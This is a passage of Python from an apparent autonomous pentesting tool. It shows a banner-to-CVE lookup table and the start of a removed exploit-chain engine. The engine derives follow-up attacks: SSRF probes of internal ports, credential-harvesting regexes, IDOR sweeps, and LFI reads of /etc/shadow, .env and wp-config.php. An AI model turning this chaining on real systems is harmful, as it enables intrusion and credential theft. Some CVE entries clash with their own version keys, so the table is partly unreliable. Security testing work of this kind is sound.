# ---------------------------------------------------------------------------
_SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3}
# ---------------------------------------------------------------------------
# BannerAnalyzer
# ---------------------------------------------------------------------------
class BannerAnalyzer:
"""Map detected software versions to known vulnerabilities."""
# Each key is "software/version" (lowercase). Prefix matching is also
# attempted so "apache/2.4.49" matches entries keyed as "apache/2.4.49".
KNOWN_VULNS: Dict[str, Dict] = {
# ---- Apache HTTPD ------------------------------------------------
"apache/2.4.49": {
"cve": "CVE-2021-41773",
"type": "path_traversal",
"severity": "critical",
"description": "Path traversal and file disclosure via crafted URI in Apache 2.4.49.",
},
"apache/2.4.50": {
"cve": "CVE-2021-42013",
"type": "rce",
"severity": "critical",
"description": "Remote code execution via path traversal bypass in Apache 2.4.50 (incomplete fix for CVE-2021-41773).",
},
"apache/2.4.51": {
"cve": "CVE-2021-44790",
"type": "buffer_overflow",
"severity": "critical",
"description": "Buffer overflow in mod_lua multipart parser in Apache <= 2.4.51.",
},
"apache/2.4.48": {
"cve": "CVE-2021-33193",
"type": "http_request_smuggling",
"severity": "high",
"description": "HTTP/2 request smuggling via crafted method in Apache 2.4.48.",
},
"apache/2.4.46": {
"cve": "CVE-2020-35452",
"type": "stack_overflow",
"severity": "high",
"description": "Stack overflow via crafted Digest nonce in mod_auth_digest (Apache <= 2.4.46).",
},
"apache/2.4.43": {
"cve": "CVE-2020-9490",
"type": "dos",
"severity": "high",
"description": "Push Diary crash via crafted Cache-Digest header in Apache 2.4.43.",
},
"apache/2.4.41": {
"cve": "CVE-2020-1927",
"type": "open_redirect",
"severity": "medium",
"description": "Open redirect in mod_rewrite when the URL starts with multiple slashes.",
},
"apache/2.4.39": {
"cve": "CVE-2019-10098",
"type": "open_redirect",
"severity": "medium",
"description": "mod_rewrite self-referential redirect causing open redirect.",
},
# ---- Nginx -------------------------------------------------------
"nginx/1.17.9": {
"cve": "CVE-2021-23017",
"type": "dns_resolver_rce",
"severity": "critical",
"description": "Off-by-one error in nginx DNS resolver allows RCE via crafted DNS response.",
},
"nginx/1.18.0": {
"cve": "CVE-2021-23017",
"type": "dns_resolver_rce",
"severity": "critical",
"description": "Nginx <= 1.20.0 DNS resolver off-by-one heap write (requires resolver directive).",
},
"nginx/1.14.0": {
"cve": "CVE-2019-9511",
"type": "dos",
"severity": "high",
"description": "HTTP/2 Data Dribble DoS in nginx < 1.16.1 / 1.17.3.",
},
"nginx/1.16.0": {
"cve": "CVE-2019-9513",
"type": "dos",
"severity": "high",
"description": "HTTP/2 Resource Loop DoS in nginx < 1.16.1 / 1.17.3.",
},
"nginx/1.13.2": {
"cve": "CVE-2017-7529",
"type": "information_disclosure",
"severity": "medium",
"description": "Integer overflow in range filter allows memory disclosure in nginx < 1.13.3.",
},
# ---- PHP ---------------------------------------------------------
"php/7.4.21": {
"cve": "CVE-2021-21706",
"type": "path_traversal",
"severity": "medium",
"description": "ZipArchive::extractTo path traversal on Windows in PHP < 7.4.27.",
},
"php/7.4.29": {
"cve": "CVE-2022-31625",
"type": "use_after_free",
"severity": "critical",
"description": "Use-after-free in pg_query_params() in PHP < 7.4.30.",
},
"php/8.0.0": {
"cve": "CVE-2021-21702",
"type": "dos",
"severity": "high",
"description": "Null pointer dereference in SoapClient in PHP 8.0.0.",
},
"php/8.0.12": {
"cve": "CVE-2021-21707",
"type": "information_disclosure",
"severity": "medium",
"description": "URL validation bypass via null bytes in PHP < 8.0.14.",
},
"php/8.1.0": {
"cve": "CVE-2022-31626",
"type": "buffer_overflow",
"severity": "critical",
"description": "Buffer overflow in mysqlnd/pdo_mysql password handling in PHP < 8.1.8.",
},
"php/8.1.2": {
"cve": "CVE-2022-31628",
"type": "dos",
"severity": "medium",
"description": "phar archive infinite loop denial-of-service in PHP < 8.1.10.",
},
"php/8.1.12": {
"cve": "CVE-2022-37454",
"type": "buffer_overflow",
"severity": "critical",
"description": "SHA-3 buffer overflow (XKCP) in PHP < 8.1.13.",
},
"php/7.4.3": {
"cve": "CVE-2020-7068",
"type": "use_after_free",
"severity": "high",
"description": "Use-after-free in PHAR parsing in PHP < 7.4.10.",
},
# ---- WordPress ---------------------------------------------------
"wordpress/5.6": {
"cve": "CVE-2021-29447",
"type": "xxe",
"severity": "high",
"description": "XXE via media file upload (iXML) in WordPress 5.6-5.7.",
},
"wordpress/5.7": {
"cve": "CVE-2021-29447",
"type": "xxe",
"severity": "high",
"description": "XXE via media file upload (iXML) in WordPress 5.6-5.7.",
},
"wordpress/5.0": {
"cve": "CVE-2019-8942",
"type": "rce",
"severity": "critical",
"description": "Authenticated RCE via crafted post meta in WordPress < 5.0.1.",
},
"wordpress/5.4": {
"cve": "CVE-2020-28032",
"type": "object_injection",
"severity": "critical",
"description": "PHP Object Injection via SimpleXML deserialization in WordPress < 5.5.2.",
},
"wordpress/6.0": {
"cve": "CVE-2022-43504",
"type": "csrf",
"severity": "medium",
"description": "CSRF token verification bypass in WordPress < 6.0.3.",
},
"wordpress/6.1": {
"cve": "CVE-2023-22622",
"type": "information_disclosure",
"severity": "medium",
"description": "Unauthenticated blind SSRF via DNS rebinding in wp-cron (WordPress < 6.1.1).",
},
"wordpress/6.2": {
"cve": "CVE-2023-38000",
"type": "xss",
"severity": "medium",
"description": "Stored XSS via block editor in WordPress < 6.3.2.",
},
# ---- jQuery ------------------------------------------------------
"jquery/1.12.4": {
"cve": "CVE-2020-11022",
"type": "xss",
"severity": "medium",
"description": "XSS via passing HTML from untrusted source to jQuery DOM manipulation in jQuery < 3.5.0.",
},
"jquery/2.2.4": {
"cve": "CVE-2020-11022",
"type": "xss",
"severity": "medium",
"description": "XSS via passing HTML from untrusted source to jQuery DOM manipulation in jQuery < 3.5.0.",
},
"jquery/3.4.1": {
"cve": "CVE-2020-11022",
"type": "xss",
"severity": "medium",
"description": "XSS in htmlPrefilter regex in jQuery < 3.5.0.",
},
"jquery/3.5.0": {
"cve": "CVE-2020-11023",
"type": "xss",
"severity": "medium",
"description": "XSS when passing <option> HTML to jQuery DOM manipulation methods in jQuery < 3.5.1.",
},
# ---- Spring Framework --------------------------------------------
"spring/4.3.0": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via data binding to ClassLoader in Spring Framework < 5.3.18.",
},
"spring/5.2.0": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via data binding to ClassLoader in Spring Framework < 5.3.18.",
},
"spring/5.3.0": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via class loader manipulation on JDK 9+ (Spring < 5.3.18).",
},
"spring/5.3.17": {
"cve": "CVE-2022-22965",
"type": "rce",
"severity": "critical",
"description": "Spring4Shell: RCE via class loader manipulation on JDK 9+ (Spring < 5.3.18).",
},
# ---- Log4j -------------------------------------------------------
"log4j/2.0": {
"cve": "CVE-2021-44228",
"type": "rce",
"severity": "critical",
"description": "Log4Shell: RCE via JNDI lookup injection in Log4j 2.0-2.14.1.",
},
"log4j/2.14.1": {
"cve": "CVE-2021-44228",
"type": "rce",
"severity": "critical",
"description": "Log4Shell: RCE via JNDI lookup injection in Log4j 2.0-2.14.1.",
},
"log4j/2.15.0": {
"cve": "CVE-2021-45046",
"type": "rce",
"severity": "critical",
"description": "Incomplete fix for Log4Shell; RCE still possible via Thread Context Map in Log4j 2.15.0.",
},
"log4j/2.16.0": {
"cve": "CVE-2021-45105",
"type": "dos",
"severity": "high",
"description": "DoS via uncontrolled recursion in lookup evaluation in Log4j 2.16.0.",
},
# ---- Apache Tomcat -----------------------------------------------
"tomcat/9.0.0": {
"cve": "CVE-2020-1938",
"type": "file_read",
"severity": "critical",
"description": "Ghostcat: AJP file read/inclusion via default AJP connector in Tomcat < 9.0.31.",
},
"tomcat/8.5.0": {
"cve": "CVE-2020-1938",
"type": "file_read",
"severity": "critical",
"description": "Ghostcat: AJP file read/inclusion via default AJP connector in Tomcat < 8.5.51.",
},
"tomcat/9.0.30": {
"cve": "CVE-2020-1938",
"type": "file_read",
"severity": "critical",
"description": "Ghostcat: AJP file read/inclusion via default AJP connector in Tomcat < 9.0.31.",
},
"tomcat/10.0.0": {
"cve": "CVE-2021-25329",
"type": "rce",
"severity": "high",
"description": "RCE via session persistence deserialization in Tomcat 10.0.0-M1 to 10.0.0.",
},
"tomcat/9.0.43": {
"cve": "CVE-2021-25122",
"type": "information_disclosure",
"severity": "high",
"description": "HTTP/2 request mix-up: responses sent to wrong client in Tomcat < 9.0.44.",
},
"tomcat/8.5.50": {
"cve": "CVE-2020-9484",
"type": "rce",
"severity": "high",
"description": "Deserialization RCE via FileStore session persistence in Tomcat < 8.5.55.",
},
# ---- OpenSSL -----------------------------------------------------
"openssl/1.0.1": {
"cve": "CVE-2014-0160",
"type": "information_disclosure",
"severity": "critical",
"description": "Heartbleed: memory disclosure via TLS heartbeat extension in OpenSSL 1.0.1-1.0.1f.",
},
"openssl/1.0.2": {
"cve": "CVE-2016-2107",
"type": "padding_oracle",
"severity": "high",
"description": "AES-NI CBC MAC check padding oracle in OpenSSL 1.0.2 before 1.0.2h.",
},
"openssl/1.1.0": {
"cve": "CVE-2017-3735",
"type": "buffer_overread",
"severity": "medium",
"description": "One-byte buffer overread parsing IPAddressFamily in OpenSSL < 1.1.0g.",
},
"openssl/1.1.1": {
"cve": "CVE-2020-1971",
"type": "dos",
"severity": "high",
"description": "Null pointer dereference in GENERAL_NAME_cmp (X.400) in OpenSSL < 1.1.1i.",
},
"openssl/3.0.0": {
"cve": "CVE-2022-3602",
"type": "buffer_overflow",
"severity": "high",
"description": "X.509 email address 4-byte buffer overflow in OpenSSL 3.0.0-3.0.6.",
},
"openssl/3.0.6": {
"cve": "CVE-2022-3786",
"type": "buffer_overflow",
"severity": "high",
"description": "X.509 email address variable-length buffer overflow in OpenSSL 3.0.0-3.0.6.",
},
# ---- Node.js -----------------------------------------------------
"node/14.0.0": {
"cve": "CVE-2021-22930",
"type": "use_after_free",
"severity": "critical",
"description": "Use-after-free on close http2 on stream canceling in Node.js < 14.17.5.",
},
"node/16.0.0": {
"cve": "CVE-2021-22931",
"type": "rce",
"severity": "critical",
"description": "Improper handling of untypical characters in domain names allowing RCE in Node.js < 16.6.2.",
},
"node/16.13.0": {
"cve": "CVE-2022-21824",
"type": "prototype_pollution",
"severity": "medium",
"description": "Prototype pollution via console.table in Node.js < 16.13.2.",
},
"node/18.0.0": {
"cve": "CVE-2022-32215",
"type": "http_request_smuggling",
"severity": "high",
"description": "HTTP request smuggling due to incorrect Transfer-Encoding parsing in Node.js < 18.5.0.",
},
"node/18.12.0": {
"cve": "CVE-2023-23918",
"type": "privilege_escalation",
"severity": "high",
"description": "Permissions policy bypass via process.mainModule in Node.js < 18.14.1.",
},
# ---- Django ------------------------------------------------------
"django/2.2": {
"cve": "CVE-2021-35042",
"type": "sqli",
"severity": "critical",
"description": "SQL injection via untrusted data in QuerySet.order_by() in Django < 2.2.25.",
},
"django/3.0": {
"cve": "CVE-2020-9402",
"type": "sqli",
"severity": "high",
"description": "SQL injection via crafted tolerance parameter in GIS functions (Django < 3.0.4).",
},
"django/3.1": {
"cve": "CVE-2021-33571",
"type": "header_injection",
"severity": "medium",
"description": "URLValidator allows leading/trailing whitespace, enabling header injection (Django < 3.1.13).",
},
"django/3.2": {
"cve": "CVE-2021-45115",
"type": "dos",
"severity": "high",
"description": "DoS via UserAttributeSimilarityValidator with a large password (Django < 3.2.11).",
},
"django/4.0": {
"cve": "CVE-2022-28346",
"type": "sqli",
"severity": "critical",
"description": "SQL injection via crafted column aliases in QuerySet.annotate()/aggregate() (Django < 4.0.4).",
},
"django/4.1": {
"cve": "CVE-2023-23969",
"type": "dos",
"severity": "high",
"description": "DoS via large Accept-Language header in Django < 4.1.6.",
},
# ---- Laravel -----------------------------------------------------
"laravel/8.0": {
"cve": "CVE-2021-3129",
"type": "rce",
"severity": "critical",
"description": "RCE via Ignition debug mode file manipulation in Laravel/Ignition < 2.5.2.",
},
"laravel/9.0": {
"cve": "CVE-2022-40482",
"type": "information_disclosure",
"severity": "medium",
"description": "Route parameter exposure via debug error pages in Laravel < 9.32.0.",
},
"laravel/7.0": {
"cve": "CVE-2021-3129",
"type": "rce",
"severity": "critical",
"description": "RCE via Ignition debug mode (phar deserialization) in Laravel/Ignition <= 2.5.1.",
},
# ---- Ruby on Rails -----------------------------------------------
"rails/5.2.0": {
"cve": "CVE-2019-5418",
"type": "file_read",
"severity": "critical",
"description": "File content disclosure via Action View render with Accept header manipulation.",
},
"rails/6.0.0": {
"cve": "CVE-2020-8163",
"type": "rce",
"severity": "critical",
"description": "RCE via code injection in Action Pack in Rails < 6.0.3.1.",
},
"rails/6.1.0": {
"cve": "CVE-2021-22885",
"type": "information_disclosure",
"severity": "high",
"description": "Possible information disclosure via unintended method execution in Action Pack.",
},
"rails/7.0.0": {
"cve": "CVE-2022-32224",
"type": "rce",
"severity": "critical",
"description": "Possible RCE via serialized columns in Active Record (Rails < 7.0.3.1).",
},
"rails/6.0.3": {
"cve": "CVE-2021-22904",
"type": "dos",
"severity": "high",
"description": "DoS via crafted Accept header in Action Controller (Rails < 6.0.3.7).",
},
# ---- Express.js --------------------------------------------------
"express/4.17.0": {
"cve": "CVE-2022-24999",
"type": "prototype_pollution",
"severity": "high",
"description": "Prototype pollution via qs library (< 6.10.3) used in Express < 4.17.3.",
},
"express/4.16.0": {
"cve": "CVE-2022-24999",
"type": "prototype_pollution",
"severity": "high",
"description": "Prototype pollution via qs library in Express < 4.17.3.",
},
"express/4.6.0": {
"cve": "CVE-2014-6393",
"type": "xss",
"severity": "medium",
"description": "XSS via missing Content-Type in Express < 4.11.0.",
},
# ---- IIS ---------------------------------------------------------
"iis/10.0": {
"cve": "CVE-2021-31166",
"type": "rce",
"severity": "critical",
"description": "HTTP protocol stack RCE (wormable) in IIS on Windows 10 / Server (KB5003173).",
},
"iis/7.5": {
"cve": "CVE-2017-7269",
"type": "buffer_overflow",
"severity": "critical",
"description": "Buffer overflow in WebDAV service in IIS 6.0/7.5 allows RCE.",
},
# ---- Drupal ------------------------------------------------------
"drupal/7.0": {
"cve": "CVE-2018-7600",
"type": "rce",
"severity": "critical",
"description": "Drupalgeddon2: RCE via Form API render array injection in Drupal 7.x < 7.58.",
},
"drupal/8.0": {
"cve": "CVE-2019-6340",
"type": "rce",
"severity": "critical",
"description": "RCE via REST module deserialization in Drupal 8.5.x < 8.5.11 / 8.6.x < 8.6.10.",
},
# ---- Joomla ------------------------------------------------------
"joomla/3.9.0": {
"cve": "CVE-2023-23752",
"type": "information_disclosure",
"severity": "high",
"description": "Unauthenticated information disclosure via Rest API in Joomla 4.0.0-4.2.7.",
},
# ---- Elasticsearch -----------------------------------------------
"elasticsearch/1.2.0": {
"cve": "CVE-2014-3120",
"type": "rce",
"severity": "critical",
"description": "RCE via MVEL scripting engine enabled by default in Elasticsearch < 1.2.1.",
},
}
# End-of-life version prefixes: any detected version starting with one of
# these is considered unsupported and should be flagged.
EOL_VERSIONS: Dict[str, List[str]] = {
"php": ["4.", "5.", "7.0", "7.1", "7.2", "7.3", "7.4", "8.0"],
"python": ["2.", "3.0", "3.1", "3.2", "3.3", "3.4", "3.5", "3.6", "3.7"],
"node": ["8.", "10.", "12.", "14.", "15.", "16.", "17.", "19."],
"django": ["1.", "2.0", "2.1", "2.2", "3.0", "3.1"],
"rails": ["4.", "5.0", "5.1", "5.2", "6.0"],
"angular": ["1.", "2.", "4.", "5.", "6.", "7.", "8.", "9.", "10.", "11."],
"jquery": ["1.", "2."],
"wordpress": ["3.", "4."],
"apache": ["2.2.", "2.0.", "1.3."],
"nginx": ["1.14.", "1.16.", "1.17."],
"openssl": ["0.", "1.0.", "1.1.0"],
"tomcat": ["6.", "7.", "8.0."],
"dotnet": ["1.", "2.", "3.0", "3.1", "5."],
"java": ["6.", "7.", "8.", "9.", "10.", "11."],
"laravel": ["5.", "6.", "7."],
"express": ["3.", "2.", "1."],
"drupal": ["6.", "7.", "8."],
"iis": ["6.", "7.", "7.5", "8."],
"elasticsearch": ["1.", "2.", "5.", "6."],
}
# ------------------------------------------------------------------
# Public API
# ------------------------------------------------------------------
def analyze(self, version_info: List[Dict]) -> List[BannerFinding]:
"""Analyse a list of detected software/version dicts.
Each dict should contain at minimum ``software`` and ``version`` keys.
Returns a list of :class:`BannerFinding` sorted by severity
(critical first).
"""
findings: List[BannerFinding] = []
for entry in version_info:
software = str(entry.get("software", "")).strip().lower()
version = str(entry.get("version", "")).strip()
if not software or not version:
continue
# --- exact match ---
key = f"{software}/{version}"
vuln = self.KNOWN_VULNS.get(key)
if vuln:
findings.append(self._to_finding(software, version, vuln, "exact"))
# --- prefix match (catches minor-version ranges) ---
for known_key, known_vuln in self.KNOWN_VULNS.items():
if known_key == key:
continue # already handled
ks, kv = known_key.split("/", 1)
if ks == software and (version.startswith(kv) or kv.startswith(version)):
findings.append(self._to_finding(software, version, known_vuln, "prefix"))
# --- EOL check ---
if self.is_eol(software, version):
findings.append(BannerFinding(
software=software,
version=version,
cve="N/A",
vuln_type="eol_software",
severity="medium",
description=f"{software} {version} has reached end-of-life and no longer receives security updates.",
source="banner_analyzer:eol_check",
))
# Deduplicate by (software, version, cve)
seen: set = set()
unique: List[BannerFinding] = []
for f in findings:
ident = (f.software, f.version, f.cve)
if ident not in seen:
seen.add(ident)
unique.append(f)
unique.sort(key=lambda f: _SEVERITY_ORDER.get(f.severity, 99))
return unique
def is_eol(self, software: str, version: str) -> bool:
"""Return True if *version* matches an end-of-life prefix for *software*."""
software = software.strip().lower()
version = version.strip()
prefixes = self.EOL_VERSIONS.get(software, [])
return any(version.startswith(p) for p in prefixes)
@staticmethod
def check_version_range(
software: str,
version: str,
min_affected: str,
max_fixed: str,
) -> bool:
"""Return True if *version* falls within [min_affected, max_fixed).
Uses tuple comparison on integer version parts so that
``"2.4.49" >= "2.4.49"`` and ``"2.4.49" < "2.4.52"`` hold.
"""
def _parse(v: str) -> Tuple[int, ...]:
parts: List[int] = []
for segment in v.split("."):
# Strip non-numeric suffixes (e.g. "3.0.0-beta")
num = ""
for ch in segment:
if ch.isdigit():
num += ch
else:
break
parts.append(int(num) if num else 0)
return tuple(parts)
try:
v = _parse(version)
lo = _parse(min_affected)
hi = _parse(max_fixed)
return lo <= v < hi
except (ValueError, TypeError):
return False
# ------------------------------------------------------------------
# Internal helpers
# ------------------------------------------------------------------
@staticmethod
def _to_finding(
software: str,
version: str,
vuln: Dict,
match_type: str,
) -> BannerFinding:
return BannerFinding(
software=software,
version=version,
cve=vuln["cve"],
vuln_type=vuln["type"],
severity=vuln["severity"],
description=vuln["description"],
source=f"banner_analyzer:known_vulns:{match_type}",
)
-872
View File
@@ -1,872 +0,0 @@
"""
NeuroSploit v3 - Exploit Chain Engine
Finding correlation, derived target generation, and attack graph
construction for autonomous pentesting. When a vulnerability is
confirmed, this engine generates follow-up targets based on 10
chain rules.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List, Optional
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class ChainableTarget:
"""A derived attack target generated from a confirmed finding."""
url: str
param: str
vuln_type: str
context: Dict[str, Any] = field(default_factory=dict)
chain_depth: int = 1
parent_finding_id: str = ""
priority: int = 2 # 1=critical, 2=high, 3=medium
method: str = "GET"
injection_point: str = "parameter"
payload_hint: Optional[str] = None
description: str = ""
@dataclass
class ChainRule:
"""Defines how a finding triggers derived targets."""
trigger_type: str # Vuln type that triggers this rule
derived_types: List[str] # Types to test on derived targets
extraction_fn: str # Method name for target extraction
priority: int = 2
max_depth: int = 3
description: str = ""
# 10 chain rules
CHAIN_RULES: List[ChainRule] = [
ChainRule(
trigger_type="ssrf",
derived_types=["lfi", "xxe", "command_injection", "ssrf"],
extraction_fn="_extract_internal_urls",
priority=1,
description="SSRF \u2192 internal service attacks",
),
ChainRule(
trigger_type="sqli_error",
derived_types=["sqli_union", "sqli_blind", "sqli_time"],
extraction_fn="_extract_db_context",
priority=1,
description="SQLi error \u2192 advanced SQLi techniques",
),
ChainRule(
trigger_type="information_disclosure",
derived_types=["auth_bypass", "default_credentials"],
extraction_fn="_extract_credentials",
priority=1,
description="Info disclosure \u2192 credential-based attacks",
),
ChainRule(
trigger_type="idor",
derived_types=["idor", "bola", "bfla"],
extraction_fn="_extract_idor_patterns",
priority=2,
description="IDOR on one resource \u2192 same pattern on sibling resources",
),
ChainRule(
trigger_type="lfi",
derived_types=["sqli", "auth_bypass", "information_disclosure"],
extraction_fn="_extract_config_paths",
priority=1,
description="LFI \u2192 config file extraction \u2192 credential discovery",
),
ChainRule(
trigger_type="xss_reflected",
derived_types=["xss_stored", "cors_misconfiguration"],
extraction_fn="_extract_xss_chain",
priority=2,
description="Reflected XSS \u2192 stored XSS / CORS chain for session theft",
),
ChainRule(
trigger_type="open_redirect",
derived_types=["ssrf", "oauth_misconfiguration"],
extraction_fn="_extract_redirect_chain",
priority=1,
description="Open redirect \u2192 OAuth token theft chain",
),
ChainRule(
trigger_type="default_credentials",
derived_types=["auth_bypass", "privilege_escalation", "idor"],
extraction_fn="_extract_auth_chain",
priority=1,
description="Default creds \u2192 authenticated attacks",
),
ChainRule(
trigger_type="exposed_admin_panel",
derived_types=["default_credentials", "auth_bypass", "brute_force"],
extraction_fn="_extract_admin_chain",
priority=1,
description="Exposed admin \u2192 credential attack on admin panel",
),
ChainRule(
trigger_type="subdomain_takeover",
derived_types=["xss_reflected", "xss_stored", "ssrf"],
extraction_fn="_extract_subdomain_targets",
priority=3,
description="Subdomain discovery \u2192 new attack surface",
),
]
class ChainEngine:
"""Exploit chain engine for finding correlation and derived target generation.
When a vulnerability is confirmed, this engine:
1. Checks chain rules for matching trigger types
2. Extracts derived targets using rule-specific extraction functions
3. Generates ChainableTarget objects for the agent to test
4. Tracks chain depth to prevent infinite recursion
5. Builds an attack graph of finding \u2192 finding relationships
Usage:
engine = ChainEngine()
derived = await engine.on_finding(finding, recon, memory)
for target in derived:
# Test target through normal vuln testing pipeline
pass
"""
MAX_CHAIN_DEPTH = 3
MAX_DERIVED_PER_FINDING = 20
def __init__(self, llm=None):
self.llm = llm
self._chain_graph: Dict[str, List[str]] = {} # finding_id \u2192 [derived_finding_ids]
self._total_chains = 0
self._chain_findings: List[str] = [] # finding IDs that came from chaining
async def on_finding(
self,
finding: Any,
recon: Any = None,
memory: Any = None,
) -> List[ChainableTarget]:
"""Process a confirmed finding and generate derived targets.
Args:
finding: The confirmed Finding object
recon: ReconData with target info
memory: AgentMemory for dedup
Returns:
List of ChainableTarget objects to test
"""
vuln_type = getattr(finding, "vulnerability_type", "")
finding_id = getattr(finding, "id", str(id(finding)))
chain_depth = getattr(finding, "_chain_depth", 0)
# Prevent infinite chaining
if chain_depth >= self.MAX_CHAIN_DEPTH:
return []
derived_targets = []
for rule in CHAIN_RULES:
# Check trigger match (exact or prefix)
if not self._matches_trigger(vuln_type, rule.trigger_type):
continue
# Extract targets using rule's extraction function
extractor = getattr(self, rule.extraction_fn, None)
if not extractor:
continue
try:
targets = extractor(finding, recon)
for target in targets[:self.MAX_DERIVED_PER_FINDING]:
target.chain_depth = chain_depth + 1
target.parent_finding_id = finding_id
target.priority = rule.priority
derived_targets.append(target)
except Exception as e:
logger.debug(f"Chain extraction failed for {rule.extraction_fn}: {e}")
# Track in graph
if derived_targets:
self._chain_graph[finding_id] = [
f"{t.vuln_type}:{t.url}" for t in derived_targets
]
self._total_chains += len(derived_targets)
logger.debug(f"Chain engine: {vuln_type} \u2192 {len(derived_targets)} derived targets")
return derived_targets[:self.MAX_DERIVED_PER_FINDING]
def _matches_trigger(self, vuln_type: str, trigger: str) -> bool:
"""Check if vuln_type matches a trigger rule."""
if vuln_type == trigger:
return True
# Allow prefix matching: sqli_error matches sqli_error
if vuln_type.startswith(trigger + "_") or trigger.startswith(vuln_type + "_"):
return True
# Special: any sqli variant triggers sqli_error rule
if trigger == "sqli_error" and vuln_type.startswith("sqli"):
return True
return False
# \u2500\u2500\u2500 Extraction Functions \u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500
def _extract_internal_urls(self, finding, recon) -> List[ChainableTarget]:
"""From SSRF: extract internal URLs for further attack."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
# Find internal IPs in response
internal_patterns = [
r'(?:https?://)?(?:127\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:10\.\d+\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:192\.168\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?(?:172\.(?:1[6-9]|2\d|3[01])\.\d+\.\d+)(?::\d+)?(?:/[^\s"<>]*)?',
r'(?:https?://)?localhost(?::\d+)?(?:/[^\s"<>]*)?',
]
found_urls = set()
for pattern in internal_patterns:
for match in re.finditer(pattern, evidence):
internal_url = match.group(0)
if not internal_url.startswith("http"):
internal_url = f"http://{internal_url}"
found_urls.add(internal_url)
# Common internal service ports
if not found_urls:
# Generate targets based on known internal ports
parsed = urlparse(url)
base_ips = ["127.0.0.1", "localhost"]
ports = [80, 8080, 8443, 3000, 5000, 8000, 9200, 6379, 27017]
for ip in base_ips:
for port in ports[:4]: # Limit
found_urls.add(f"http://{ip}:{port}/")
for internal_url in list(found_urls)[:10]:
for vuln_type in ["lfi", "command_injection", "ssrf"]:
targets.append(ChainableTarget(
url=internal_url,
param="url",
vuln_type=vuln_type,
context={"source": "ssrf_chain", "internal": True},
description=f"SSRF chain: {vuln_type} on internal {internal_url}",
))
return targets
def _extract_db_context(self, finding, recon) -> List[ChainableTarget]:
"""From SQLi error: extract DB type and generate advanced payloads."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
# Detect database type from error
db_type = "unknown"
db_indicators = {
"mysql": ["mysql", "mariadb", "you have an error in your sql syntax"],
"postgresql": ["postgresql", "pg_", "unterminated quoted string"],
"mssql": ["microsoft sql", "mssql", "unclosed quotation mark", "sqlserver"],
"oracle": ["ora-", "oracle", "quoted string not properly terminated"],
"sqlite": ["sqlite", "sqlite3"],
}
evidence_lower = evidence.lower()
for db, indicators in db_indicators.items():
if any(i in evidence_lower for i in indicators):
db_type = db
break
# Generate type-specific advanced SQLi targets
advanced_types = ["sqli_union", "sqli_blind", "sqli_time"]
for vuln_type in advanced_types:
targets.append(ChainableTarget(
url=url,
param=param,
vuln_type=vuln_type,
context={"db_type": db_type, "source": "sqli_chain"},
description=f"SQLi chain: {vuln_type} ({db_type}) on {param}",
payload_hint=f"db_type={db_type}",
))
return targets
def _extract_credentials(self, finding, recon) -> List[ChainableTarget]:
"""From info disclosure: extract credentials for auth attacks."""
targets = []
evidence = getattr(finding, "evidence", "")
url = getattr(finding, "url", "")
# Extract potential credentials
cred_patterns = [
r'(?:password|passwd|pwd)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:api_key|apikey|api-key)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:token|secret|auth)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
r'(?:username|user|login)\s*[=:]\s*["\']?([^\s"\'<>&]+)',
]
found_creds = {}
for pattern in cred_patterns:
matches = re.findall(pattern, evidence, re.I)
for match in matches:
if len(match) > 3: # Skip trivial matches
found_creds[pattern.split("|")[0].strip("(?")] = match
# Generate auth attack targets
if recon:
parsed = urlparse(url)
base = f"{parsed.scheme}://{parsed.netloc}"
admin_paths = ["/admin", "/api/admin", "/dashboard", "/management"]
for path in admin_paths:
targets.append(ChainableTarget(
url=f"{base}{path}",
param="",
vuln_type="auth_bypass",
context={"discovered_creds": found_creds, "source": "info_disclosure_chain"},
description=f"Credential chain: auth bypass at {path}",
))
return targets
def _extract_idor_patterns(self, finding, recon) -> List[ChainableTarget]:
"""From IDOR: apply same pattern to sibling resources."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
parsed = urlparse(url)
path = parsed.path
# Pattern: /users/{id} \u2192 /orders/{id}, /profiles/{id}
sibling_resources = [
"users", "orders", "profiles", "accounts", "invoices",
"documents", "messages", "transactions", "settings",
"notifications", "payments", "subscriptions",
]
# Extract the resource pattern
path_parts = [p for p in path.split("/") if p]
if len(path_parts) >= 2:
# Replace the resource name with siblings
original_resource = path_parts[-2] if path_parts[-1].isdigit() else path_parts[-1]
resource_id = path_parts[-1] if path_parts[-1].isdigit() else "1"
base = f"{parsed.scheme}://{parsed.netloc}"
for sibling in sibling_resources:
if sibling != original_resource:
new_path = path.replace(original_resource, sibling)
targets.append(ChainableTarget(
url=f"{base}{new_path}",
param=param or "id",
vuln_type="idor",
context={"source": "idor_pattern_chain", "original_resource": original_resource},
description=f"IDOR chain: {sibling} (from {original_resource})",
method=getattr(finding, "method", "GET"),
))
return targets[:10]
def _extract_config_paths(self, finding, recon) -> List[ChainableTarget]:
"""From LFI: generate config file read targets."""
targets = []
url = getattr(finding, "url", "")
param = getattr(finding, "parameter", "")
# Config files that may contain credentials
config_files = [
"/etc/passwd",
"/etc/shadow",
"../../../../.env",
"../../../../config/database.yml",
"../../../../wp-config.php",
"../../../../config.php",
"../../../../.git/config",
